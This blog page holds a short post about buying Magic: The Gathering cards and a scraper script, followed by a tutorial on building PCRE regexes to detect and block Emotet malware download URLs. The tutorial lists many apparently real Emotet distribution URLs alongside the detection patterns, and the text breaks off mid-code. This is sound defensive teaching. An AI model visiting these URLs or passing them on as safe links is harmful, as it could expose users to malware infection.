/* CAT(1) */

When Magic the Gathering (MtG) came out I was beyond excited. As a fairly young kid, this was unlike anything I'd ever seen before and for a few years I would spend every penny from chores, lunch money, and birthday cards to round out my collection. It was a blast, I really enjoyed it, and developed many fond memories around playing and collecting the cards.

Alas, as with all good things, that came to an end as life started to kick in. Fast forward 20+ years to today and I'm free to indulge myself in my old(new) hobbies again. One thing I always wanted to do was buy a booster box. SO.MANY.CARDS! But holy shit is it not cheap, or at least not for past-me, so it was always a pipe dream until now.

I've been shitposting with friends at work about doing a MtG draft at a conference we'll be attending one night, rehashing old memories, and then I felt a familiar feeling...an itch that needed to be scratched. I read up on the latest Amonkhet set and fell in love with the theme of it so I went out and bought an Amonkhet Booster Box, the Amonkhet Deck Builder's Toolkit, and an Amonkhet Bundle Box. Indulge I shall.

It's a metric crap ton of cards, especially going from 0, and I found myself with an overwhelming amount of information to take in and try to process. Tons of new rules, new abilities, new everything. I spent the majority of time looking up card rules to try and get a grasp of the game, not even knowing where to begin with building a new deck. I cobbled together some decks as I opened packs but I wondered if, within my cache of newfound cards, there may already be a deck someone else has built and posted online. Surely that would be the case with 1,100 cards, right?

TL;DR don't buy packs and expect to have any semblance of a pre-constructed deck, official or otherwise.

To come to this conclusion, which I admittedly already thought may be the case before buying all of these (still didn't deter me from making the purchase though, at least to do it once) I created a script to essentially search decks I scrape online and attempt to match my library against. The script mtgdeckhunter.py is up on Github with usage examples and output data. You can skip everything below if you're just interested in that instead of my rambling about it.

After some time on the net looking up new MtG rules, I came across three main sites (Deckbox, MtG Goldfish, and MtG Top 8) that had tons of decks available to peruse in all kinds of formats. The problem then became not finding the decks, but identifying which decks I might have most of the cards for. The idea being I could then just craft some decks other people put thought into, give them a whirl, see if I liked that style, then maybe go from there. Unfortunately none of these sites have that feature available except for MtG Goldfish - part of their monthly pay service.

I decided I'd try to craft something simple in Python to scrape the publicly available decks and see if I had any matches. What I've now realized is that if you just have one "set" (eg Amonkhet) then you're pretty much SoL on finding pre-made decks. Since there are so many editions in rotation, you rarely find real decks solely focused on just one set except the officially released ones. In hindsight, I'd have bought a few of the "Deck Builder's Toolkits" and Bundle Boxes for maybe the most recent 2-3 sets or just a couple of the official pre-constructed ones that actually don't seem too bad. Initially the idea of buying a pre-constructed deck had me sticking my nose up as if I'm some kind of MtG legend (I'm not).

Anywho, I'm not providing the decks I've pulled from these sites, that is an exercise left to the user, but if you have a ton of cards that you've got listed out on your computer, then maybe this program will prove helpful to you. I ended up not really using it at all...go figure...and built two EDH decks that have been pretty fun in my limited playing. I may revisit this once I have a more well rounded collection.

You can see my cards from the three purchases mentioned previously on Deckbox or in text format here, if you're interested in what I got. Deckbox says the total value of cards in the set is $283.95, which I think is pretty good since it's about 2x what I paid (doesn't account for the foils I got). The new formats (eg EDH) seem really fun and I'm excited to get back into this hobby.


*NOTE: I likely won't be updating this code anytime soon for the reasons above. It's probably quite a bit buggy and after having collected 100,000+ decks, I quickly recognized using JSON as the storage format as being a terrible idea (80MB+ file). Also I'd say it's not particularly stable as it relies upon parsing these sites which can change their code at any moment.

Regular expressions (regex) are a language construct that allow you to define a search pattern. The flexibility of this language allows you to craft search patterns for tons of practical applications, including passive identification of network traffic. Specifically, they can allow you to pattern match on URL's so that you may quickly identify malicious sites frequently used by malware command and control (C2), domain generation algorithms (DGA's), and other such activities.

I fell in love with using regex as a defensive tool while doing incident response many years ago. The depth of control they provide naturally lends itself to the forensic, analyst, and responder lines of work. This blog may be old hat to most blue teamers out there, but if not, hopefully it serves as an educational resource on how you can use data to build PCRE's for network defense.

Over the course of this blog, I'll cover developing Perl compatible regex (PCRE) for the Emotet banking malware download URL's and develop PCRE's that encompass multiple campaigns that can then be used on a proxy device (blocking), in a SIEM (identification), or whatever system you have that supports utilizing these expressions. Emotet is a great candidate for review as it has varying domain structures that are ripe for pattern matching. I'll walk you through how I develop these PCRE's, along with refining them, and then finally how they can be vetted for false-positives (FP) to make them ready for production.

Throughout the blog, I'll be using a Python script I wrote called pcre_check to assist with the analysis. Essentially, all the tool does is take a parameter for a file containing your PCRE's, a parameter for a file containing the URL's, and then some flags for how to display the pattern matches and misses. This is helpful for the rapid development of PCRE's because, more often than not, you find yourself in the midst of developing these when the shit has hit the fan...or at least I always did.
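As a rough illustration of that workflow (this is not the actual pcre_check source), here is a minimal Python sketch. It assumes Python's built-in re module behaves closely enough to a PCRE engine for the simple patterns used in this post, and the check_patterns name and its return shape are made up for the example.

```python
import re


def check_patterns(patterns, urls):
    """Return (hits, misses).

    hits maps each pattern string to the list of URLs it matched;
    misses lists the URLs that no pattern matched.
    """
    compiled = [(text, re.compile(text)) for text in patterns]
    hits = {text: [] for text in patterns}
    misses = []
    for url in urls:
        matched = False
        for text, rx in compiled:
            if rx.search(url):
                hits[text].append(url)
                matched = True
        if not matched:
            misses.append(url)
    return hits, misses


# Tiny demo: one pattern and two URLs taken from the sample set.
demo_patterns = [r"^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$"]
demo_urls = [
    "http://www.stellaimpianti.it/download2467/",
    "http://zeroneed.com/FNN-40446899.dokument/",
]
demo_hits, demo_misses = check_patterns(demo_patterns, demo_urls)
for pattern, matched in demo_hits.items():
    print("Count: %d/%d PCRE: %s" % (len(matched), len(demo_urls), pattern))
for url in demo_misses:
    print("NO HIT:", url)
```

Keeping hits per pattern and misses as a separate list mirrors the two views used in the rest of this post: per-PCRE counts, and the list of URL's still left to cover.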

I'll be focusing solely on URL's in this example; however, on the off chance you're not familiar with regex, keep in mind that a myriad of tools, from the byte level all the way up to the application level I'll be covering here, can utilize regex. You should absolutely learn at least the basics, as it's something that can be a life saver in your daily toolbox.

Before I get too much further in, here are a couple of helpful links, that I find myself constantly visiting, which you may find useful if you want to review or build your own PCRE's. I'll try to explain the regex syntax and logic as I go but I'll assume you know the basic structure of the language. If not, hit the references below.

This will be a long blog, and a little free flowing, as I develop these while enumerating step-by-step. Below are some jumps so you can skip around as needed.

Initial Sample Corpus

The Emotet banking malware download locations have a lot of different URL structures across their different campaigns. It's been popping up on my radar more and more lately so I want to try and enumerate the patterns here to further expand what I can catch. That being said, the very first thing I need to do is collect a decent sample of the various campaigns so that I can begin to try and match them. Prior to my current $dayjob, I'd approach this by hitting up multiple blogs from researchers or security companies and compile the URL set. When I didn't have access to systems that made this task fairly trivial, I would frequently build them from the below resources.

Usually just Googling the threat name, "Emotet domains", brings you to sites like this one, which have links to Pastebin posts containing loads of samples. The more the better but, in my experience, between 15-30 URL's is usually enough to make a solid base for an individual pattern and then you can tweak it during the false-positive (FP) checking phase.

I've placed 696 Emotet URL's on Github which you can use to follow along or throw in a blocklist.

Pattern Recognition / Enumeration

Once you have a decent sample set, the next step is to analyze the data and look for patterns. I'll show the various changes to the PCRE's as I analyze the URL's and you can see how they evolve into the final product after each iteration. To better illustrate this, I'll just focus on the last 20 URL's at a time but normally I'll have 3 terminals open: top window editing the URL file, middle window with pcre_check output, bottom window editing the PCRE file. This layout allows me to quickly modify and validate changes on the fly, significantly reducing the turnaround time.

Below is the first run of the script, showing that none of the URL's matched; the output is truncated to the last 20.

Round 1

$ python pcre_check.py -p emotet_pcres -u emotet_urls -n
[+] NO HITS [+]
http://12back.com/dw3wz-ue164-qqv/
http://4glory.net/p7lrq-s191-iv/
...
http://www.melodywriters.com/INVOICE-864339-98261/
http://www.prodzakaz.com.ua/H27560xzwsS/
http://www.stellaimpianti.it/download2467/
http://www.stepstonedev.com/field/download7812/
http://www.surreycountycleaners.com/t5wx-x064-mzdb/
http://www.voloskof.net/Sn83160EngQs/
http://www.wildweek.com/EDHFR-08-77623-document-May-04-2017/
http://www.ziyufang.studio/project/wp-content/plugins/nprojects/download5337/
http://wyskocil.de/ORDER-525808-73297/
http://xionglutions.com/NDKBS-51-84402-document-May-03-2017/
http://xionglutions.com/wl7dh-uf201-asnw/
http://xyphoid.com/RRT-13279129.dokument/
http://xyphoid.com/SCANNED/MM3431UCNPCEZRO/
http://yildiriminsaat.com.tr/JCV-71815736.dokument/
http://zahahadidmiami.com/K38258Q/
http://zeroneed.com/FNN-40446899.dokument/
http://ziarahsutera.com/5377959590/
http://zonasacra.com/zH83293YizhQ/
http://zvarga.com/15-12-07/CUST-9405847-8348/
http://zypern-aktiv.de/wp-content/plugins/wordfence/img9re-a789-stz/

There are a couple of things that jump out immediately on the first review.

For each of the PCRE's, I've grown accustomed to starting them with the below structure.

^http:\/\/[^\x2F]+\/

This matches any line that begins ("^") with "http://" followed by any characters except ("[^ ]") a forward slash ("\x2F"), up to the first forward slash. This ensures we match the domain regardless of what TLD or subdomains may be present.
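Read literally, that description corresponds to a prefix like the one in this short sketch. It uses Python's re module as a stand-in for a PCRE engine (an assumption on my part; the syntax used here is common to both), and the URL is one of the samples from the list above.

```python
import re

# Anchor at line start, literal "http://", then everything that is not
# a forward slash (\x2F), then the first forward slash.
BASE = re.compile(r"^http:\/\/[^\x2F]+\/")

url = "http://www.prodzakaz.com.ua/H27560xzwsS/"
match = BASE.match(url)

# The match stops right after the host, whatever TLD or subdomains it has.
domain_part = match.group(0)
print(domain_part)
```

Everything after that first slash is left over for the campaign-specific part of each pattern.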

For ease of illustration, I'm going to group the variations and break them down individually.

[Group 01]

http://www.surreycountycleaners.com/t5wx-x064-mzdb/
http://xionglutions.com/wl7dh-uf201-asnw/
http://zypern-aktiv.de/wp-content/plugins/wordfence/img9re-a789-stz/

For this pattern, we have 4-5 alpha(lower)numeric, dash, 4-5 alpha(lower)numeric, dash, 3-4 alpha(lower). We'll also want to account for the last line which has the path multiple levels in. We can accomplish this by putting our "[^\x2F]+\/" section in a group and saying the group can repeat one or more times (eg match everything between the forward slashes until the last one, where our pattern is).


[Group 02]

http://www.melodywriters.com/INVOICE-864339-98261/
http://wyskocil.de/ORDER-525808-73297/
http://zvarga.com/15-12-07/CUST-9405847-8348/

This next group appears to use a word in caps, dash, 6-7 numbers, dash, 4-5 numbers. We'll need to account for the subpaths again as well. In this case, I prefer to group full words instead of using a character range, which helps when trying to be false-positive averse.
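To make the "full words versus character range" trade-off concrete, here is a small sketch. The strict pattern uses the word list from the samples above; the loose variant with an uppercase range and the example.com URL are both hypothetical, included only for comparison. Python's re module stands in for PCRE.

```python
import re

PREFIX = r"^http:\/\/([^\x2F]+\/)+"

# Word list taken from the Group 02 samples.
STRICT = re.compile(PREFIX + r"(INVOICE|ORDER|CUST)-[0-9]{6,7}-[0-9]{4,5}\/$")
# Hypothetical looser variant: any 4-7 uppercase letters instead of words.
LOOSE = re.compile(PREFIX + r"[A-Z]{4,7}-[0-9]{6,7}-[0-9]{4,5}\/$")

samples = [
    "http://www.melodywriters.com/INVOICE-864339-98261/",
    "http://wyskocil.de/ORDER-525808-73297/",
    "http://zvarga.com/15-12-07/CUST-9405847-8348/",
]
# Made-up, benign-looking URL that is not part of the sample set.
benign = "http://example.com/TICKET-123456-7890/"

strict_hits = [u for u in samples if STRICT.search(u)]
loose_hits = [u for u in samples if LOOSE.search(u)]
print(len(strict_hits), len(loose_hits))
print(bool(STRICT.search(benign)), bool(LOOSE.search(benign)))
```

Both variants cover the three samples, but only the range-based one also fires on the unrelated URL, which is the kind of FP the word grouping is meant to avoid.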


[Group 03]

http://www.prodzakaz.com.ua/H27560xzwsS/
http://www.voloskof.net/Sn83160EngQs/
http://xyphoid.com/SCANNED/MM3431UCNPCEZRO/
http://zahahadidmiami.com/K38258Q/
http://ziarahsutera.com/5377959590/
http://zonasacra.com/zH83293YizhQ/

I feel this group may end up getting split later. We have one URL which is purely numerical and then two which have no lowercase letters. We'll cross that bridge as we look at more samples, if necessary. Another thing to note is that this group has a very weak pattern in that it is very generic, which means it will likely match a lot of legitimate URL's and not hold up during FP testing. We'll cross that bridge when we get to it as well.

For now, it's a mix of 7-15 alphanumeric characters.
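A quick sketch of why this one is so weak: the same pattern that covers the six samples also matches perfectly ordinary paths. The example.com URL's below are invented for illustration and are not from any data set; Python's re module is used as a stand-in for PCRE.

```python
import re

GROUP_03 = re.compile(r"^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,15}\/$")

emotet = [
    "http://www.prodzakaz.com.ua/H27560xzwsS/",
    "http://www.voloskof.net/Sn83160EngQs/",
    "http://xyphoid.com/SCANNED/MM3431UCNPCEZRO/",
    "http://zahahadidmiami.com/K38258Q/",
    "http://ziarahsutera.com/5377959590/",
    "http://zonasacra.com/zH83293YizhQ/",
]
# Hypothetical everyday URL's, made up for this example.
benign = [
    "http://example.com/contact/",
    "http://example.com/products/",
    "http://example.com/blog/archive/",
]

emotet_hits = [u for u in emotet if GROUP_03.search(u)]
benign_hits = [u for u in benign if GROUP_03.search(u)]
print(len(emotet_hits), "of", len(emotet), "samples matched")
print(len(benign_hits), "of", len(benign), "benign URL's matched")
```

Any final path segment of 7-15 letters or digits qualifies, so words like "contact" or "archive" are enough to trigger it.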


[Group 04]

http://xyphoid.com/RRT-13279129.dokument/
http://yildiriminsaat.com.tr/JCV-71815736.dokument/
http://zeroneed.com/FNN-40446899.dokument/

This one, and the next two, all look pretty straightforward: 3 alpha(upper), dash, 8 numbers, period, "dokument" string.


[Group 05]

http://www.wildweek.com/EDHFR-08-77623-document-May-04-2017/
http://xionglutions.com/NDKBS-51-84402-document-May-03-2017/

Similarly, very structured (which is good for us): 5 alpha(upper), dash, 2 numbers, dash, 5 numbers, dash, "document" string, dash, "May" string, dash, 2 numbers, dash, "2017" string. I've defaulted to using "2017" as a string since it aligns with their usage of it as a date so it seems unlikely to change.


[Group 06]

http://www.stellaimpianti.it/download2467/
http://www.stepstonedev.com/field/download7812/
http://www.ziyufang.studio/project/wp-content/plugins/nprojects/download5337/

The string "download", 4 numbers.
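These three samples are a handy way to see what the repeating "[^\x2F]+\/" group from Group 01 buys us. The sketch below compares a flat prefix (domain only, which is my own construction for contrast) against the grouped prefix, using Python's re module as a stand-in for PCRE.

```python
import re

SUFFIX = r"download[0-9]{4}\/$"
# Flat prefix: only the domain, then the pattern must follow immediately.
FLAT = re.compile(r"^http:\/\/[^\x2F]+\/" + SUFFIX)
# Grouped prefix: one or more "segment/" chunks before the pattern.
GROUPED = re.compile(r"^http:\/\/([^\x2F]+\/)+" + SUFFIX)

samples = [
    "http://www.stellaimpianti.it/download2467/",
    "http://www.stepstonedev.com/field/download7812/",
    "http://www.ziyufang.studio/project/wp-content/plugins/nprojects/download5337/",
]

flat_hits = [u for u in samples if FLAT.search(u)]
grouped_hits = [u for u in samples if GROUPED.search(u)]
print("flat:", len(flat_hits), "grouped:", len(grouped_hits))
```

The flat version only catches the URL where the pattern sits directly under the domain, while the grouped version catches it at any depth.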


I'll throw these into the emotet_pcres file and see how each performs against our target data set of known-bad Emotet sites.

[+] FOUND [+]
Count: 24/696
Comment: Group 01 - [ t5wx-x064-mzdb ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{4,5}-[a-z0-9]{4,5}-[a-z]{3,4}\/$

[+] FOUND [+]
Count: 43/696
Comment: Group 02 - [ INVOICE-864339-98261 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST)-[0-9]{6,7}-[0-9]{4,5}\/$

[+] FOUND [+]
Count: 177/696
Comment: Group 03 - [ H27560xzwsS ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,15}\/$

[+] FOUND [+]
Count: 30/696
Comment: Group 04 - [ RRT-13279129.dokument ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{3}-[0-9]{8}\.dokument\/$

[+] FOUND [+]
Count: 24/696
Comment: Group 05 - [ EDHFR-08-77623-document-May-04-2017 ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{5}-[0-9]{2}-[0-9]{5}-document-May-[0-9]{2}-2017\/$

[+] FOUND [+]
Count: 62/696
Comment: Group 06 - [ download2467 ]
PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$

Pretty low across the board except for group 3, which is the one I mentioned is too loose to begin with. From here on out, if I don't list a particular group, it implies there was no change to the PCRE.

Round 2

The next 20 URL's are below.

http://web2present.com/Invoice-538878-14610/
http://webbmfg.com/krupy/gallery2/g2data/LUqc663BAyN333-HoO/
http://webbsmail.co.uk/DIDE-19-85247-document-May-04-2017/
http://webergy.co.uk/15-14-47/Cust-0910279-3981/
http://webics.org/Cust-951068-69554/
http://websajt.nu/ap6ohc-au152-urttp/
http://wescographics.com/17-40-07/Invoice-5558936-1201/
http://whiteroofradio.com/YD796MJO974-NNW/
http://wightman.cc/ipa0oab-j490-keap/
http://wilstu.com/hHiDSaaP03Y95TIGpIUS4Aa/
http://wingitproductions.org/NUDA-X-52454-DE/
http://wlrents.com/CUST.-Document-YDI-04-GQ389557/
http://wnyil.org/wnyil_transfer/Ups__com__WebTracking__tracknum__4DFH74180493688150/ORDER.-Document-SY-92-E736730/
http://wolffy.net/17-00-07/Invoice-9545415-1483/
http://wortis.com/CH760Wcv003-Luh/
http://www.anti-corruption.su/Cust-3708876-8210/
http://www.anti-corruption.su/TNO-59-97413-document-May-04-2017/
http://www.babyo.com.mx/Invoice-583156-73417/
http://www.doodle.tj/yW1NZ-sh00-cH/
http://zypern-aktiv.de/wp-content/plugins/wordfence/img9re-a789-stz/

It looks like we have a few new groups as well. I'll attempt to highlight in red the changes to the PCRE's which might make the changes clearer.

[Group 01] - [ t5wx-x064-mzdb ]

http://websajt.nu/ap6ohc-au152-urttp/
http://wightman.cc/ipa0oab-j490-keap/
http://www.doodle.tj/yW1NZ-sh00-cH/
http://zypern-aktiv.de/wp-content/plugins/wordfence/img9re-a789-stz/

You'll note that the third one now introduces capital letters; it's possible this is a separate campaign but I'll circle back to this later during review. The main changes will be the addition of the capital letters and adjustment on the ranges, which will likely be the case for the rest of the groups.

OLD: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{4,5}-[a-z0-9]{4,5}-[a-z]{3,4}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-z0-9]{4,5}-[a-z]{2,5}\/$

[Group 02] - [ INVOICE-864339-98261 ]

http://web2present.com/Invoice-538878-14610/
http://webergy.co.uk/15-14-47/Cust-0910279-3981/
http://webics.org/Cust-951068-69554/
http://wescographics.com/17-40-07/Invoice-5558936-1201/
http://wolffy.net/17-00-07/Invoice-9545415-1483/
http://www.anti-corruption.su/Cust-3708876-8210/
http://www.babyo.com.mx/Invoice-583156-73417/

New strings "Invoice" and "Cust".

OLD: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST)-[0-9]{6,7}-[0-9]{4,5}\/$
NEW: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$

[Group 03] - [ H27560xzwsS ]

http://wilstu.com/hHiDSaaP03Y95TIGpIUS4Aa/

Range adjustment (making this one even more useless).

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,15}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,23}\/$

[Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]

http://webbsmail.co.uk/DIDE-19-85247-document-May-04-2017/
http://www.anti-corruption.su/TNO-59-97413-document-May-04-2017/

Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{5}-[0-9]{2}-[0-9]{5}-document-May-[0-9]{2}-2017\/$
NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-document-May-[0-9]{2}-2017\/$

[Group 07] - [ LUqc663BAyN333-HoO ]

http://webbmfg.com/krupy/gallery2/g2data/LUqc663BAyN333-HoO/
http://whiteroofradio.com/YD796MJO974-NNW/
http://wortis.com/CH760Wcv003-Luh/

This cluster is defined by one dash towards the end: 11-14 alphanumeric, dash, 3 alpha.


[Group 08] - [ NUDA-X-52454-DE ]

http://wingitproductions.org/NUDA-X-52454-DE/

Only one sample so I'll match it exactly: 4 alpha(upper), dash, 1 alpha(upper), dash, 5 numbers, dash, 2 alpha(upper).


[Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]

http://wlrents.com/CUST.-Document-YDI-04-GQ389557/
http://wnyil.org/wnyil_transfer/Ups__com__WebTracking__tracknum__4DFH74180493688150/ORDER.-Document-SY-92-E736730/

Similar to Group 2: same word choice, period, dash, "Document" string, dash, 2-3 alpha(upper), dash, 2 numbers, dash, 7-8 alpha(upper)numeric.


Note that the delta in the output after each group is just something I've included after the fact to show the progress for the blog.

[+] FOUND [+]
Count: 66/696 (+42)
Comment: [Group 01] - [ t5wx-x064-mzdb ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-z0-9]{4,5}-[a-z]{2,5}\/$

[+] FOUND [+]
Count: 80/696 (+37)
Comment: [Group 02] - [ INVOICE-864339-98261 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$

[+] FOUND [+]
Count: 190/696 (+13)
Comment: [Group 03] - [ H27560xzwsS ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,23}\/$

[+] FOUND [+]
Count: 30/696
Comment: [Group 04] - [ RRT-13279129.dokument ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{3}-[0-9]{8}\.dokument\/$

[+] FOUND [+]
Count: 59/696 (+35)
Comment: [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-document-May-[0-9]{2}-2017\/$

[+] FOUND [+]
Count: 62/696
Comment: [Group 06] - [ download2467 ]
PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$

[+] FOUND [+]
Count: 15/696
Comment: [Group 07] - [ LUqc663BAyN333-HoO ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,14}-[a-zA-Z]{3}\/$

[+] FOUND [+]
Count: 3/696
Comment: [Group 08] - [ NUDA-X-52454-DE ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{4}-[A-Z]{1}-[0-9]{5}-[A-Z]{2}\/$

[+] FOUND [+]
Count: 20/696
Comment: [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER)\.-Document-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,8}\/$

Round 3

The next set of 20 URL's.

http://theocforrent.com/BG-47535325/zp3x-r88-wuh.view/
http://thepogs.net/rs4eG-Md93-FSZV/
http://thesubservice.com/ORDER.-Document-9543529814/
http://theuntoldsorrow.co.uk/ORDER.-XI-80-UY913942/
http://tiger12.com/TGA-48-76252-doc-May-04-2017/
http://timmadden.com.au/qzw1s-wc740-m/
http://toppprogramming.com/Cust-8328499631/
http://tpsystem.net/TaVS391hyCaD623-dJ/
http://transfinity.co.uk/sam/fathers-day/htdocs/b2m-qp699-jxmln/
http://tridentii.com/OY-30676027.dokument/
http://tscoaching.co.uk/l1R-q60-pe/
http://uncover.jp/XwXL806QaDN792-jr/
http://uncover.jp/r-2psl-vo440-lz.doc/
http://visionsoflightphotography.com/FRMLW-RNT-41482-DE/
http://visuals.com/CUST.-VT-38-RH422386/
http://voxellab.com/BBM-07-75350-doc-May-04-2017/
http://vspacecreative.co.uk/O2-view-report-818/c1o-jn07-er.view/
http://wayanad.net/xhW017TRfP646-z/
http://wb0rur.com/ZGAG-59-63863-doc-May-05-2017/
http://www.doodle.tj/yW1NZ-sh00-cH/

One new variant in this set.

[Group 01] - [ t5wx-x064-mzdb ]

http://thepogs.net/rs4eG-Md93-FSZV/
http://timmadden.com.au/qzw1s-wc740-m/
http://transfinity.co.uk/sam/fathers-day/htdocs/b2m-qp699-jxmln/
http://tscoaching.co.uk/l1R-q60-pe/
http://www.doodle.tj/yW1NZ-sh00-cH/

Range adjustment and additional case changes.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-z0-9]{4,5}-[a-z]{2,5}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-zA-Z0-9]{4,5}-[a-zA-Z]{1,5}\/$

[Group 02] - [ INVOICE-864339-98261 ]

http://toppprogramming.com/Cust-8328499631/

This could be a different campaign as it breaks from the double-dashes but it's so similar to group 2 that I'll leave it for now and possibly revisit.

The second dash I'll make optional, which should allow the lowest ranges of the numerical sections to match. I'll use an optional capturing group ("(-)?") for the second dash. Creating a capture group and then placing the "?" quantifier after it causes the group to match zero or one time, thus making it optional.

OLD: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$
NEW: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}(-)?[0-9]{4,5}\/$
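Here is a small sketch of the optional dash in action, with Python's re module standing in for PCRE. The two URL's come from the Round 2 and Round 3 lists; the variable names are just for the example.

```python
import re

WORDS = r"(INVOICE|ORDER|CUST|Invoice|Cust)"
PREFIX = r"^http:\/\/([^\x2F]+\/)+"

# OLD: the second dash is required.
OLD = re.compile(PREFIX + WORDS + r"-[0-9]{6,7}-[0-9]{4,5}\/$")
# NEW: "(-)?" lets the second dash appear zero or one time.
NEW = re.compile(PREFIX + WORDS + r"-[0-9]{6,7}(-)?[0-9]{4,5}\/$")

with_dash = "http://webics.org/Cust-951068-69554/"
without_dash = "http://toppprogramming.com/Cust-8328499631/"

old_results = (bool(OLD.search(with_dash)), bool(OLD.search(without_dash)))
new_results = (bool(NEW.search(with_dash)), bool(NEW.search(without_dash)))
print("OLD:", old_results)
print("NEW:", new_results)
```

The 10-digit run only matches the NEW pattern because 6 digits plus 4 digits, with the dash skipped, adds up to the lowest end of both ranges.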

[Group 04] - [ RRT-13279129.dokument ]

http://tridentii.com/OY-30676027.dokument/

Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{3}-[0-9]{8}\.dokument\/$
NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$

[Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]

http://tiger12.com/TGA-48-76252-doc-May-04-2017/
http://voxellab.com/BBM-07-75350-doc-May-04-2017/
http://wb0rur.com/ZGAG-59-63863-doc-May-05-2017/

Add "doc" string to grouping.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-document-May-[0-9]{2}-2017\/$
NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-(document|doc)-May-[0-9]{2}-2017\/$

[Group 07] - [ LUqc663BAyN333-HoO ]

http://tpsystem.net/TaVS391hyCaD623-dJ/
http://uncover.jp/XwXL806QaDN792-jr/
http://wayanad.net/xhW017TRfP646-z/

Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,14}-[a-zA-Z]{3}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,15}-[a-zA-Z]{1,3}\/$

[Group 08] - [ NUDA-X-52454-DE ]

http://visionsoflightphotography.com/FRMLW-RNT-41482-DE/

Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{4}-[A-Z]{1}-[0-9]{5}-[A-Z]{2}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,3}-[0-9]{5}-[A-Z]{2}\/$

[Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]

http://thesubservice.com/ORDER.-Document-9543529814/
http://theuntoldsorrow.co.uk/ORDER.-XI-80-UY913942/
http://visuals.com/CUST.-VT-38-RH422386/

Couple of things going on here.

There's a new grouping of words for the second part, and the first entry is purely numerical without dashes, which looks similar to the new entry for Group 2. To account for these, I'll use optional capturing groups again to build around them. It makes the rule slightly less accurate but with the other anchors in it, I think it'll still be unique enough to not FP.

OLD: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER)\.-Document-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,8}\/$
NEW: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER)\.-(Document|XI|VT)((-[A-Z]{2,3})?-[0-9]{2})?-[A-Z0-9]{7,10}\/$

[Group 10] - [ zp3x-r88-wuh.view ]

http://theocforrent.com/BG-47535325/zp3x-r88-wuh.view/
http://uncover.jp/r-2psl-vo440-lz.doc/
http://vspacecreative.co.uk/O2-view-report-818/c1o-jn07-er.view/

The "doc" and "view" ones may be different campaigns but, again, I'll lump them together for now and will separate at the end if necessary: 1-4 alpha(lower)numeric, dash, 3-4 alpha(lower)numeric, dash, optional 5 alpha(lower)numeric, dash, 2-3 alpha(lower), period, group "view" or "doc" strings.
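The sketch below runs the three samples through the Group 10 PCRE as it appears in the pcre_check output for this round, and prints which optional middle segment and which extension each one used. Python's re module stands in for PCRE, and the describe helper is made up for the example.

```python
import re

GROUP_10 = re.compile(
    r"^http:\/\/([^\x2F]+\/)+"
    r"[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{5})?-[a-z]{2,3}\.(view|doc)\/$"
)

samples = [
    "http://theocforrent.com/BG-47535325/zp3x-r88-wuh.view/",
    "http://uncover.jp/r-2psl-vo440-lz.doc/",
    "http://vspacecreative.co.uk/O2-view-report-818/c1o-jn07-er.view/",
]


def describe(url):
    """Return (optional_segment, extension), or None when there is no match."""
    m = GROUP_10.search(url)
    if m is None:
        return None
    # Group 2 is the optional "-xxxxx" chunk, group 3 is "view" or "doc".
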